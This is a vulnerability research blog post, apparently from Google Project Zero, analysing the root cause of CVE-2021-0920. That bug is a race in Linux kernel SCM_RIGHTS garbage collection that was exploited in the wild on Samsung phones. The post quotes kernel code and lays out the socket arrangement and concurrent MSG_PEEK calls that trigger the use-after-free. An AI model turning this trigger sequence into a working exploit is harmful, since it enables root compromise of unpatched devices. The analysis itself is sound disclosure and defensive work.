Summary

Total Articles Found: 9

Top Articles:

  • FF Sandbox Escape (CVE-2020-12388)
  • One Byte to rule them all
  • In-the-Wild Series: Windows Exploits
  • The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)
  • In-the-Wild Series: Android Exploits
  • In-the-Wild Series: Android Post-Exploitation
  • Who Contains the Containers?
  • In-the-Wild Series: Chrome Exploits
  • In-the-Wild Series: Chrome Infinity Bug

The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)

Published: 2022-08-10 23:00:00

Popularity: 26

Author: Google Project Zero

A deep dive into an in-the-wild Android exploit

Guest Post by Xingyu Jin, Android Security Research

This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.

Overview of in-the-wild CVE-2021-0920 exploits

A surveillance vendor named Wintego developed an exploit for CVE-2021-0920, a Linux kernel 0-day in the socket subsystem, and used it in the wild from at least November 2020 (based on the earliest captured sample) until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.

Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.

This issue was initially discovered in 2016 by a Red Hat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.

Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) on a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read/write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.

Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.

Introduction

CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.

What is SCM_RIGHTS?

Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. This LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing with this blogpost.
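Before looking at the kernel side, a small userspace sketch may help make this concrete. The following is a minimal, illustrative example of passing a file descriptor with SCM_RIGHTS; the send_fd helper name and the lack of error handling are our own, not from the original post:

#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Hypothetical helper: pass fd_to_pass over the unix socket "sock". */
static int send_fd(int sock, int fd_to_pass)
{
        char dummy = 'x';
        struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
        /* Union guarantees the control buffer is suitably aligned. */
        union {
                char buf[CMSG_SPACE(sizeof(int))];
                struct cmsghdr align;
        } u;
        struct msghdr msg = {
                .msg_iov = &iov,
                .msg_iovlen = 1,
                .msg_control = u.buf,
                .msg_controllen = sizeof(u.buf),
        };
        struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);

        cmsg->cmsg_level = SOL_SOCKET;
        cmsg->cmsg_type = SCM_RIGHTS;   /* fd-passing control message */
        cmsg->cmsg_len = CMSG_LEN(sizeof(int));
        memcpy(CMSG_DATA(cmsg), &fd_to_pass, sizeof(int));

        /* The kernel bumps the refcount of the underlying file struct,
         * so the sender may close(fd_to_pass) right after this call. */
        return sendmsg(sock, &msg, 0);
}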

Sending

As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.

struct scm_fp_list {
        short                   count;
        short                   max;
        struct user_struct      *user;
        struct file             *fp[SCM_MAX_FD];
};

unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.

struct scm_cookie {
        struct pid              *pid;           /* Skb credentials */
        struct scm_fp_list      *fp;            /* Passed files         */
        struct scm_creds        creds;          /* Skb credentials      */
#ifdef CONFIG_SECURITY_NETWORK
        u32                     secid;          /* Passed security ID   */
#endif
};

To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures.

Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):

/*
 * Need to duplicate file references for the sake of garbage
 * collection.  Otherwise a socket in the fps might become a
 * candidate for GC while the skb is not yet queued.
 */
UNIXCB(skb).fp = scm_fp_dup(scm->fp);
if (!UNIXCB(skb).fp)
        return -ENOMEM;

The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:

struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
{
        struct scm_fp_list *new_fpl;
        int i;

        if (!fpl)
                return NULL;

        new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),
                          GFP_KERNEL);
        if (new_fpl) {
                for (i = 0; i < fpl->count; i++)
                        get_file(fpl->fp[i]);
                new_fpl->max = new_fpl->count;
                new_fpl->user = get_uid(fpl->user);
        }
        return new_fpl;
}

Let’s examine a concrete example. Assume we have sockets A and B, and A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender is appended to B’s sk_receive_queue, which stores received datagrams:

[Figure: The sk_buff carries the scm_fp_list structure]

The reference count of A is incremented to 2 and the reference count of B is still 1.

Receiving

Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:

/* Mark read part of skb as used */
if (!(flags & MSG_PEEK)) {
        UNIXCB(skb).consumed += chunk;

        sk_peek_offset_bwd(sk, chunk);

        if (UNIXCB(skb).fp)
                unix_detach_fds(&scm, skb);

        if (unix_skb_len(skb))
                break;

        skb_unlink(skb, &sk->sk_receive_queue);
        consume_skb(skb);

        if (scm.fp)
                break;

The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:

for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;
     i++, cmfptr++)
{
        struct socket *sock;
        int new_fd;
        err = security_file_receive(fp[i]);
        if (err)
                break;
        err = get_unused_fd_flags(MSG_CMSG_CLOEXEC & msg->msg_flags
                                  ? O_CLOEXEC : 0);
        if (err < 0)
                break;
        new_fd = err;
        err = put_user(new_fd, cmfptr);
        if (err) {
                put_unused_fd(new_fd);
                break;
        }
        /* Bump the usage count and install the file. */
        sock = sock_from_file(fp[i], &err);
        if (sock) {
                sock_update_netprioidx(&sock->sk->sk_cgrp_data);
                sock_update_classid(&sock->sk->sk_cgrp_data);
        }
        fd_install(new_fd, get_file(fp[i]));
}

/*
 * All of the files that fit in the message have had their
 * usage counts incremented, so we just free the list.
 */
__scm_destroy(scm);

Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:

void __scm_destroy(struct scm_cookie *scm)
{
        struct scm_fp_list *fpl = scm->fp;
        int i;

        if (fpl) {
                scm->fp = NULL;
                for (i=fpl->count-1; i>=0; i--)
                        fput(fpl->fp[i]);
                free_uid(fpl->user);
                kfree(fpl);
        }
}
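The userspace counterpart of this receive path looks roughly like the following sketch (recv_fd is a hypothetical helper mirroring send_fd above, using the same headers; the flags argument will matter later when we discuss MSG_PEEK):

/* Hypothetical helper: receive one fd from the unix socket "sock".
 * Returns the newly installed descriptor, or -1 on failure. */
static int recv_fd(int sock, int flags)
{
        char dummy;
        struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
        union {
                char buf[CMSG_SPACE(sizeof(int))];
                struct cmsghdr align;
        } u;
        struct msghdr msg = {
                .msg_iov = &iov,
                .msg_iovlen = 1,
                .msg_control = u.buf,
                .msg_controllen = sizeof(u.buf),
        };
        struct cmsghdr *cmsg;
        int fd = -1;

        if (recvmsg(sock, &msg, flags) < 0)
                return -1;
        /* Walk the control messages; scm_detach_fds has already called
         * fd_install() for each passed file by the time this returns. */
        for (cmsg = CMSG_FIRSTHDR(&msg); cmsg; cmsg = CMSG_NXTHDR(&msg, cmsg))
                if (cmsg->cmsg_level == SOL_SOCKET &&
                    cmsg->cmsg_type == SCM_RIGHTS)
                        memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
        return fd;
}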

Reference Counting and Inflight Counting

As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.

Let’s consider the following scenario:

  1. The process creates sockets A and B.
  2. A sends socket A to socket B.
  3. B sends socket B to socket A.
  4. Close A.
  5. Close B.

[Figure: Scenario for a reference count cycle]

Both sockets are closed prior to accepting the passed file descriptors. The reference counts of A and B are both 1 and can't be further decremented because the sockets were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures, and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count is also incremented.
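As a concrete illustration, the five steps above can be reproduced with a handful of syscalls. This is a hedged sketch reusing the hypothetical send_fd helper from earlier:

#include <sys/socket.h>
#include <unistd.h>

static void make_unbreakable_cycle(void)
{
        int s[2];   /* s[0] plays the role of A, s[1] of B */

        socketpair(AF_UNIX, SOCK_STREAM, 0, s);  /* step 1 */
        send_fd(s[0], s[0]);  /* step 2: A sends itself; queued on B */
        send_fd(s[1], s[1]);  /* step 3: B sends itself; queued on A */
        close(s[0]);          /* step 4 */
        close(s[1]);          /* step 5 */
        /* Each socket's refcount now equals its inflight count and is
         * held only by the queued skbs; only the GC can reclaim them. */
}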

When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernel increments unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:

void unix_inflight(struct user_struct *user, struct file *fp)
{
        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {
                struct unix_sock *u = unix_sk(s);

                if (atomic_long_inc_return(&u->inflight) == 1) {
                        BUG_ON(!list_empty(&u->link));
                        list_add_tail(&u->link, &gc_inflight_list);
                } else {
                        BUG_ON(list_empty(&u->link));
                }
                unix_tot_inflight++;
        }
        user->unix_inflight++;
        spin_unlock(&unix_gc_lock);
}

Thus, here is what the sk_buff looks like when transferring a file descriptor between sockets A and B:

[Figure: The inflight count of A is incremented]

When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.

Let’s revisit the reference count cycle scenario before the close syscalls. This cycle is breakable because either socket can still receive the transmitted file and break the reference cycle:

[Figure: Breakable cycle before closing A and B]

After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:

[Figure: Unbreakable cycle after closing A and B]

Now, let’s check another example. Assume we have sockets A, B and 𝛼:

  1. A sends socket A to socket B.
  2. B sends socket B to socket A.
  3. B sends socket B to socket 𝛼.
  4. 𝛼 sends socket 𝛼 to socket B.
  5. Close A.
  6. Close B.

[Figure: Breakable cycle for A, B and 𝛼]

The cycle is breakable because we can get the newly installed file descriptor B' from socket 𝛼 and the newly installed file descriptor A' from B'.

Garbage Collection

A high level view of garbage collection is available from lwn.net:

"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.

At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."

To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:

  1. Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
  2. Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
  3. After this iterative process, only sockets that are solely referenced by other sockets within the gc_candidates list are left.

Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference count equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):

list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
        long total_refs;
        long inflight_refs;

        total_refs = file_count(u->sk.sk_socket->file);
        inflight_refs = atomic_long_read(&u->inflight);

        BUG_ON(inflight_refs < 1);
        BUG_ON(total_refs < inflight_refs);

        if (total_refs == inflight_refs) {
                list_move_tail(&u->link, &gc_candidates);
                __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
                __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
        }
}

Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#L138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):

/* Now remove all internal in-flight reference to children of
 * the candidates.
 */
list_for_each_entry(u, &gc_candidates, link)
        scan_children(&u->sk, dec_inflight, NULL);

After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.

To do this, the kernel puts the candidate on the not_cycle_list instead, iterates through the receive queue of each transmitted file in the gc_candidates list (garbage.c#L281), and increments the inflight counts back. The entire process is done recursively so that the garbage collection avoids purging reachable sockets:

/* Restore the references for children of all candidates,
 * which have remaining references.  Do this recursively, so
 * only those remain, which form cyclic references.
 *
 * Use a "cursor" link, to make the list traversal safe, even
 * though elements might be moved about.
 */
list_add(&cursor, &gc_candidates);
while (cursor.next != &gc_candidates) {
        u = list_entry(cursor.next, struct unix_sock, link);

        /* Move cursor to after the current position. */
        list_move(&cursor, &u->link);

        if (atomic_long_read(&u->inflight) > 0) {
                list_move_tail(&u->link, &not_cycle_list);
                __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
                scan_children(&u->sk, inc_inflight_move_tail, NULL);
        }
}
list_del(&cursor);

Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).

/* Now gc_candidates contains only garbage.  Restore original
 * inflight counters for these as well, and remove the skbuffs
 * which are creating the cycle(s).
 */
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
        scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a
 * cycle.  Restore these to the inflight list.
 */
while (!list_empty(&not_cycle_list)) {
        u = list_entry(not_cycle_list.next, struct unix_sock, link);
        __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
        list_move_tail(&u->link, &gc_inflight_list);
}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist);

spin_lock(&unix_gc_lock);

__skb_queue_purge clears every skb from the receiver queue:

/**
 *      __skb_queue_purge - empty a list
 *      @list: list to empty
 *
 *      Delete all buffers on an &sk_buff list. Each buffer is removed from
 *      the list and one reference dropped. This function does not take the
 *      list lock and the caller must hold the relevant locks to use it.
 */
void skb_queue_purge(struct sk_buff_head *list);
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
        struct sk_buff *skb;

        while ((skb = __skb_dequeue(list)) != NULL)
                kfree_skb(skb);
}

There are two ways to trigger the garbage collection process:

  1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets.
  2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.

Note that unix_gc is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gc invocation.
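In other words, both entry points are reachable from unprivileged userspace, something the exploit relies on. A brief illustrative sketch (the fd is assumed to be an AF_UNIX socket and msg a prepared message header):

#include <sys/socket.h>
#include <unistd.h>

static void reach_gc_entry_points(int unix_fd, struct msghdr *msg)
{
        /* 1. sendmsg() on a unix socket first calls wait_for_unix_gc(),
         *    which starts a collection once there are more than 16,000
         *    inflight sockets. */
        sendmsg(unix_fd, msg, 0);

        /* 2. Closing the last userspace reference runs the socket file
         *    release path, which invokes unix_gc() directly. */
        close(unix_fd);
}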

Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:

  1. Socket f00 sends socket f00 to socket f01.
  2. Socket f01 sends socket f01 to socket 𝛼.
  3. Close f00.
  4. Close f01.

Before starting the garbage collection process, the status of the socket file descriptors is:

  • f00: ref = 1, inflight = 1
  • f01: ref = 1, inflight = 1
  • 𝛼: ref = 1, inflight = 0

[Figure: Breakable cycle formed by f00, f01 and 𝛼]

During the garbage collection process, f00 and f01 are considered garbage candidates. The inflight count of f00 is dropped to zero, but the count of f01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f01’s receive queue. As a result, f00 and f01 are not treated as garbage anymore.

CVE-2021-0920 Root Cause Analysis

When a user receives an SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.

recvmsg without MSG_PEEK flag

The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. It calls unix_detach_fds to decrement the inflight count and clear the list of passed file descriptors (scm_fp_list) from the skb:

static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)
{
        int i;

        scm->fp = UNIXCB(skb).fp;
        UNIXCB(skb).fp = NULL;

        for (i = scm->fp->count-1; i >= 0; i--)
                unix_notinflight(scm->fp->user, scm->fp->fp[i]);
}

The unix_notinflight from unix_detach_fds will reverse the effect of unix_inflight by decrementing the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)
{
        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {
                struct unix_sock *u = unix_sk(s);

                BUG_ON(!atomic_long_read(&u->inflight));
                BUG_ON(list_empty(&u->link));

                if (atomic_long_dec_and_test(&u->inflight))
                        list_del_init(&u->link);
                unix_tot_inflight--;
        }
        user->unix_inflight--;
        spin_unlock(&unix_gc_lock);
}

Later, skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#L2451) to destroy the current skb. Following the call chain kfree(skb) -> __kfree_skb, the kernel will invoke the function pointer skb->destructor (code), which redirects to unix_destruct_scm:

static void unix_destruct_scm(struct sk_buff *skb)
{
        struct scm_cookie scm;

        memset(&scm, 0, sizeof(scm));
        scm.pid  = UNIXCB(skb).pid;
        if (UNIXCB(skb).fp)
                unix_detach_fds(&scm, skb);

        /* Alas, it calls VFS */
        /* So fscking what? fput() had been SMP-safe since the last Summer */
        scm_destroy(&scm);
        sock_wfree(skb);
}

In fact, unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp was already cleared by the earlier unix_detach_fds call. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked to install a new file descriptor.

recvmsg with MSG_PEEK flag

The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#L2149):

/* It is questionable, see note in unix_dgram_recvmsg.
 */
if (UNIXCB(skb).fp)
        scm.fp = scm_fp_dup(UNIXCB(skb).fp);

sk_peek_offset_fwd(sk, chunk);

if (UNIXCB(skb).fp)
        break;

Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.
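Using the hypothetical recv_fd helper sketched earlier, the peek-then-read pattern at the core of the bug looks like this:

static void peek_then_read(int sock)
{
        /* MSG_PEEK: scm_fp_dup() bumps the file reference count, the skb
         * stays on sk_receive_queue, and, crucially, unix_gc_lock is
         * never taken, so nothing synchronizes with an ongoing GC. */
        int peeked = recv_fd(sock, MSG_PEEK);

        /* Normal read: unix_detach_fds() drops the inflight count under
         * unix_gc_lock and the skb is unlinked and freed. */
        int taken = recv_fd(sock, 0);

        (void)peeked;
        (void)taken;
}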

recvmsg Examples

Let’s see a concrete example. Assume there are the following socket pairs:

  • f00, f01
  • f10, f11

Now, the program does the following operations:

  • f00 → [f00] → f01 (meaning f00 sends [f00] to f01)
  • f10 → [f00] → f11
  • Close(f00)

[Figure: Breakable cycle formed by f00, f01, f10 and f11]

Here is the status:

  • inflight(f00) = 2, ref(f00) = 2
  • inflight(f01) = 0, ref(f01) = 1
  • inflight(f10) = 0, ref(f10) = 1
  • inflight(f11) = 0, ref(f11) = 1

If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f00 as the garbage candidate. However, f00 will not have its inflight count altered and the kernel will not purge any garbage.

If f01 then calls recvmsg with the MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f01 gets a new file descriptor f00', which increments the reference count on f00:

[Figure: MSG_PEEK increments the reference count of f00 while the receive queue is not cleared]

Status:

  • inflight(f00) = 2, ref(f00) = 3
  • inflight(f01) = 0, ref(f01) = 1
  • inflight(f10) = 0, ref(f10) = 1
  • inflight(f11) = 0, ref(f11) = 1

Then, f01 calls recvmsg without the MSG_PEEK flag, and f01’s receive queue is cleared. f01 also fetches a new file descriptor f00'':

[Figure: The receive queue of f01 is cleared and f00'' is obtained from f01]

Status:

  • inflight(f00) = 1, ref(f00) = 3
  • inflight(f01) = 0, ref(f01) = 1
  • inflight(f10) = 0, ref(f10) = 1
  • inflight(f11) = 0, ref(f11) = 1

UAF Scenario

From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object.

Let’s see how the captured 0-day sample triggers the bug step by step (a simplified version; in reality more threads work together, but this demonstrates the core idea). First of all, the sample allocates the following socket pairs and a single socket 𝛼:

  • f00, f01
  • f10, f11
  • f20, f21
  • f30, f31
  • sock 𝛼 (in reality there might be thousands of 𝛼 sockets, used to prolong the garbage collection process in order to evade a BUG_ON check introduced later).

Now, prior to any recvmsg calls, the program closes the following file descriptors:

  • Close(f00)
  • Close(f01)
  • Close(f11)
  • Close(f10)
  • Close(f30)
  • Close(f31)
  • Close(𝛼)

Here is the status:

  • inflight(f00) = N + 1, ref(f00) = N + 1
  • inflight(f01) = 2, ref(f01) = 2
  • inflight(f10) = 3, ref(f10) = 3
  • inflight(f11) = 1, ref(f11) = 1
  • inflight(f20) = 0, ref(f20) = 1
  • inflight(f21) = 0, ref(f21) = 1
  • inflight(f31) = 1, ref(f31) = 1
  • inflight(𝛼) = 1, ref(𝛼) = 1

If the garbage collection process happens now, the kernel performs the following scrutiny:

  • List f00, f01, f10, f11, f31 and 𝛼 as garbage candidates, and decrease the inflight count for the candidate children in each receive queue.
  • Since f21 is not considered a candidate, f11’s inflight count remains above zero.
  • Recursively restore the inflight counts.
  • Nothing is considered garbage.

A potential skb UAF by race condition can be triggered by:

  1. Call recvmsg with the MSG_PEEK flag from f21 to get f11'.
  2. Call recvmsg with the MSG_PEEK flag from f11 to get f10'.
  3. Concurrently do the following operations:
     a. Call recvmsg without the MSG_PEEK flag from f11 to get f10''.
     b. Call recvmsg with the MSG_PEEK flag from f10.

How is it possible? Let’s see a case where the race condition is not hit so there is no UAF:

Time flows downward; each step is labeled with the thread that performs it:

  1. Thread 0: unix_gc starts.
  2. Thread 0, stage 0: lists f00, f01, f10, f11, f31 and 𝛼 as garbage candidates.
  3. Thread 1: calls recvmsg with the MSG_PEEK flag from f21 to get f11'. The reference count is increased: scm.fp = scm_fp_dup(UNIXCB(skb).fp);
  4. Thread 0, stage 0: decreases the inflight count for the children of every garbage candidate. Status after stage 0: inflight(f00) = 0, inflight(f01) = 0, inflight(f10) = 0, inflight(f11) = 1, inflight(f31) = 0, inflight(𝛼) = 0.
  5. Thread 0, stage 1: recursively restores the inflight count of any candidate that still has a positive inflight count. All inflight counts are restored.
  6. Thread 0, stage 2: no garbage; unix_gc returns.
  7. Thread 1: calls recvmsg with the MSG_PEEK flag from f11 to get f10'.
  8. Thread 1: calls recvmsg without the MSG_PEEK flag from f11 to get f10''.
  9. Thread 2: calls recvmsg with the MSG_PEEK flag from f10.

Everyone is happy: no use-after-free occurs.

However, if the second recvmsg occurs just after stage 1 of the garbage collection process, the UAF is triggered:

Time flows downward again:

  1. Thread 0: unix_gc starts.
  2. Thread 0, stage 0: lists f00, f01, f10, f11, f31 and 𝛼 as garbage candidates.
  3. Thread 1: calls recvmsg with the MSG_PEEK flag from f21 to get f11'. The reference count is increased: scm.fp = scm_fp_dup(UNIXCB(skb).fp);
  4. Thread 0, stage 0: decreases the inflight count for the children of every garbage candidate. Status after stage 0: inflight(f00) = 0, inflight(f01) = 0, inflight(f10) = 0, inflight(f11) = 1, inflight(f31) = 0, inflight(𝛼) = 0.
  5. Thread 0, stage 1: starts restoring the inflight counts.
  6. Thread 1: calls recvmsg with the MSG_PEEK flag from f11 to get f10'.
  7. Thread 1: calls recvmsg without the MSG_PEEK flag from f11 to get f10''. unix_detach_fds sets UNIXCB(skb).fp = NULL, then blocks on spin_lock(&unix_gc_lock) in unix_notinflight.
  8. Thread 0, stage 1: scan_inflight cannot find candidate children from f11 (its fp list is gone), so their inflight counts accidentally remain zero.
  9. Thread 0, stage 2: f00, f01, f10, f31 and 𝛼 are garbage; purging starts.
  10. Thread 2: starts calling recvmsg with the MSG_PEEK flag from f10', expecting to receive f00'. It gets skb = skb_peek(&sk->sk_receive_queue), an skb that is about to be freed by thread 0.
  11. Thread 0, stage 2: purges the hitlist, calling __skb_unlink and then kfree_skb.
  12. Thread 2: state->recv_actor(skb, skip, chunk, state) touches the freed skb: use-after-free.
  13. Thread 0: GC finished.
  14. Thread 1: unblocks; garbage collection may start again, and thread 1 finally gets f10''.

Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not processed or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and inflight sockets don't form an unbreakable cycle.

Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f11 a garbage candidate. For this reason, the next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.

Patch Analysis

CVE-2021-0920 was found in 2016

The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided correct patch advice, but it was not accepted by the Linux kernel community:

[Figure: Patch was not applied in 2016]

In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.

Patch in 2021

Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:

+       spin_lock(&unix_gc_lock);
+       spin_unlock(&unix_gc_lock);

The patch is confusing: it’s rare to see such lock usage in software development. Regardless, the empty lock/unlock pair makes the MSG_PEEK path wait for the completion of any ongoing garbage collection, so the UAF issue is resolved.

BUG_ON Added in 2017

